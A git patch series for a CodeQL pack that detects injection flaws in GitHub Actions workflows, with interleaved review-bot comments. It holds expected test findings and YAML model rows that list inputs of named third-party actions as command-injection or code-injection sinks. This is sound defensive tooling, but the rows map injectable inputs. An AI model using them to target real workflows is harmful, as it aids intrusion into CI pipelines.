@@ -307,6 +309,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 0051914245f5f4e210e6bf06edff609d032ccb46 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:21:59 +0200 Subject: [PATCH 0158/1267] Add `.cache` to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) 
diff --git a/.gitignore b/.gitignore index 1127e8f55db..4ba9d315acc 100644 --- a/.gitignore +++ b/.gitignore @@ -4,3 +4,4 @@ ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ db/ +.cache \ No newline at end of file From a817a22cc7ac10417f6c7cd8c137d0d7139bf87d Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:22:36 +0200 Subject: [PATCH 0159/1267] Remove redundant import --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 1 - ql/lib/codeql/actions/dataflow/FlowSteps.qll | 1 - 2 files changed, 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c0e0e759120..8cbca48af0a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,7 +1,6 @@ private import actions private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.Ast::Utils as Utils private import codeql.actions.security.ArtifactPoisoningQuery /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e66c8e7c1b9..36965166d3b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -6,7 +6,6 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.Ast::Utils as Utils private import codeql.actions.security.ArtifactPoisoningQuery /** From c56f220b13d2dcf1c310035776369fc88d60a089 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:23:28 +0200 Subject: [PATCH 0160/1267] Add provenance field --- .../codeql/actions/dataflow/ExternalFlow.qll | 23 +++++++++++-------- .../internal/ExternalFlowExtensions.qll | 10 +++++--- ql/test/library-tests/test.ql | 10 ++++---- 3 files changed, 27 insertions(+), 16 deletions(-) 
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c1c93221d1a..cc7e4c633e3 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -8,9 +8,10 @@ private import actions * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag * - output arg: To node (prefixed with either `env.` or `output.`) + * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind) { - Extensions::sourceModel(action, version, output, kind) +predicate sourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::sourceModel(action, version, output, kind, provenance) } /** @@ -21,9 +22,12 @@ predicate sourceModel(string action, string version, string output, string kind) * - input arg: From node (prefixed with either `env.` or `input.`) * - output arg: To node (prefixed with either `env.` or `output.`) * - kind: Either 'Taint' or 'Value' + * - provenance: verification of the model */ -predicate summaryModel(string action, string version, string input, string output, string kind) { - Extensions::summaryModel(action, version, input, output, kind) +predicate summaryModel( + string action, string version, string input, string output, string kind, string provenance +) { + Extensions::summaryModel(action, version, input, output, kind, provenance) } /** 
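Review bot: The new QLDoc bullet `- provenance: verification of the model`, added to all three doc comments in ExternalFlow.qll, does not say which values are accepted or what they mean. Every consumer in the later hunks (`externallyDefinedSource`, `externallyDefinedStoreStep`, `externallyDefinedSink`) passes `_`, so the column is carried but never read. I would spell the bullet out, e.g. `- provenance: how the model was verified (list the accepted values here)`, and note that it is not yet used for filtering. Because `sourceModel`, `summaryModel` and `sinkModel` each gain a column, any existing data-extension rows or external callers written for the old arity would need updating. The diffstat lists only three `.qll`/`.ql` files, so it is worth confirming that no model files were missed.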
@@ -33,14 +37,15 @@ predicate summaryModel(string action, string version, string input, string outpu * - version: Either '*' or a specific SHA/Tag * - input: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind + * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string input, string kind) { - Extensions::sinkModel(action, version, input, kind) +predicate sinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::sinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind) and + sourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -63,7 +68,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint") and + summaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -85,7 +90,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind) and + sinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 89cf4de0261..8e8ce10bba9 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll 
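Review bot: `externallyDefinedSource` binds the new column to `_` in `sourceModel(action, version, fieldName, kind, _)`, so provenance is stored but never read; `externallyDefinedStoreStep` and `externallyDefinedSink` in the next two hunks do the same. Every row therefore contributes sources, steps and sinks equally whatever its provenance string says, including rows supplied by any additional extension pack. If that is intended for now, say so next to the call, e.g. `// provenance is informational only; rows are not filtered by it`, so readers do not assume unreviewed models are excluded. The bodies of all three predicates continue outside their hunks.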
+++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,16 +5,20 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel(string action, string version, string output, string kind); +extensible predicate sourceModel( + string action, string version, string output, string kind, string provenance +); /** * Holds if a summary model exists for the given parameters. */ extensible predicate summaryModel( - string action, string version, string input, string output, string kind + string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel(string action, string version, string input, string kind); +extensible predicate sinkModel( + string action, string version, string input, string kind, string provenance +); diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 4ee330a4466..afe382fa4d9 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -49,12 +49,14 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string kind) { - sourceModel(action, version, output, kind) +query predicate sources(string action, string version, string output, string kind, string provenance) { + sourceModel(action, version, output, kind, provenance) } -query predicate summaries(string action, string version, string input, string output, string kind) { - summaryModel(action, version, input, output, kind) +query predicate summaries( + string action, string version, string input, string output, string kind, string provenance +) { + summaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } 
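Review bot: Adding a column to the three `extensible predicate` signatures changes the tuple shape every data-extension row must have, yet the doc comments above them (`Holds if a source model exists for the given parameters.`) still do not list the columns. Rows written for the old shape in packs outside this repository would presumably stop loading (confirm against the extension loader), which would drop sources and sinks without any alert. Document the order in each comment, e.g. `* Columns: action, version, output, kind, provenance.` for `sourceModel`, with the matching lists for `summaryModel` and `sinkModel`.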
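Review bot: `sources` and `summaries` are updated for the new column, but nothing in this hunk exercises `sinkModel`, whose signature changed in the same commit. The diffstat's 10 changed lines for `test.ql` are all accounted for here, so the file apparently has no `sinkModel` call. A parallel predicate would pin the third signature: `query predicate sinks(string action, string version, string input, string kind, string provenance) { sinkModel(action, version, input, kind, provenance) }`.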
From c373238fa61c58ebb80ba0442b155173f40fa18a Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:23:53 +0200 Subject: [PATCH 0161/1267] Add subfolders to `dataExtensions` --- ql/lib/qlpack.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2b3896d0cf0..deb926bafff 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -14,3 +14,4 @@ groups: - yaml dataExtensions: - ext/*.model.yml + - ext/**/*.model.yml From 5a12a2213b091001439b04e356a199446a13da6b Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Thu, 11 Apr 2024 11:24:42 +0200 Subject: [PATCH 0162/1267] Add provenance to existing models --- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ql/lib/ext/TEST-RW-MODELS.model.yml | 8 ++-- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 4 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 24 ++++++------ ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 10 ++--- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 8 ++-- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 4 +- .../aszc_change-string-case-action.model.yml | 6 +-- ...ctions_configure-aws-credentials.model.yml | 12 +++--- .../axel-op_googlejavaformat-action.model.yml | 4 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 6 +-- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 6 +-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 4 +- ql/lib/ext/cachix_cachix-action.model.yml | 6 +-- ql/lib/ext/changesets_action.model.yml | 4 +- .../ext/cloudflare_wrangler-action.model.yml | 4 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 6 +-- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- .../ext/dailydotdev_action-devcard.model.yml | 4 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 4 +- 
.../dawidd6_action-ansible-playbook.model.yml | 4 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 12 +++--- ...er-practice_actions-setup-docker.model.yml | 6 +-- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 8 ++-- ql/lib/ext/expo_expo-github-action.model.yml | 4 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 4 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 4 +- ql/lib/ext/game-ci_unity-builder.model.yml | 4 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ql/lib/ext/getsentry_action-release.model.yml | 4 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 4 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 8 ++-- .../ext/gradle_gradle-build-action.model.yml | 6 +-- ql/lib/ext/haya14busa_action-cond.model.yml | 4 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 8 ++-- ql/lib/ext/ilammy_setup-nasm.model.yml | 4 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 6 +-- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 12 +++--- .../ext/jitterbit_get-changed-files.model.yml | 14 +++---- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 6 +-- .../ext/jurplel_install-qt-action.model.yml | 12 +++--- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 8 ++-- ...han_pull-request-comment-trigger.model.yml | 4 +- 
...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 4 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 4 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 6 +-- .../manusa_actions-setup-minikube.model.yml | 8 ++-- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 14 +++---- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 4 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 22 +++++------ ql/lib/ext/msys2_setup-msys2.model.yml | 4 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 4 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +-- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 6 +-- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 6 +-- .../preactjs_compressed-size-action.model.yml | 4 +- ql/lib/ext/py-actions_flake8.model.yml | 14 +++---- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 8 ++-- ...vecircus_android-emulator-runner.model.yml | 38 +++++++++---------- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 16 ++++---- .../ext/renovatebot_github-action.model.yml | 10 ++--- .../ext/roots_issue-closer-action.model.yml | 4 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- 
...ction-detect-and-tag-new-version.model.yml | 4 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 10 ++--- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 8 ++-- ql/lib/ext/timheuer_base64-to-file.model.yml | 4 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +-- ql/lib/ext/tj-actions_changed-files.model.yml | 34 ++++++++--------- .../tj-actions_verify-changed-files.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 8 ++-- ...ss_conventional-changelog-action.model.yml | 20 +++++----- .../tryghost_action-deploy-theme.model.yml | 4 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 8 ++-- .../ext/wearerequired_lint-action.model.yml | 6 +-- ql/lib/ext/webfactory_ssh-agent.model.yml | 6 +-- .../xt0rted_slash-command-action.model.yml | 4 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 8 ++-- ql/lib/ext/zaproxy_action-full-scan.model.yml | 8 ++-- 135 files changed, 359 insertions(+), 359 deletions(-) diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index e3d97adf69d..67455900ec3 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 4ff387b1c5a..65952bccb35 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml 
+++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] - - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] + - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo"] + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection"] + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index cd409f38b59..9b36680af8f 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script", "*", "input.script", "code-injection"] + - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index aabd5a3ce36..63e99abd4d3 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml 
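Review bot: These `octo-org/...` rows look like test fixtures (the source kind is `Foo`), yet the file sits in `ql/lib/ext/`, which `qlpack.yml` loads through `ext/*.model.yml`, and the rows are now labelled `manual` like the curated models. Anything that later relies on provenance cannot tell them apart from reviewed models. Consider moving the file under the test tree, or at least adding a header comment such as `# Test-only models for the reusable-workflow tests; not real actions` (purpose inferred from the file name, confirm).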
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index ad65775e58d..41b67c2a625 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml 
@@ -3,19 +3,19 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", 
"command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 638ff449735..f2b8c8549a9 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index c632a3a1ff2..7cb2e10e926 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] - - ["anchore/sbom-action", "*", "input.format", "command-injection"] - - ["anchore/sbom-action", "*", "input.path", "command-injection"] - - ["anchore/sbom-action", "*", "input.file", "command-injection"] - - ["anchore/sbom-action", "*", "input.image", "command-injection"] + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.path", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.file", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 26e5adea505..83f09bc6bde 100644 
--- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] + - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index 2903888a731..bdd8a8f77c9 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 5ecd36f0926..7e5f5c9ee6a 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index b81f5c17ca2..8daa9a9c2b3 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 21dcd22c8b7..80502e487b8 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all 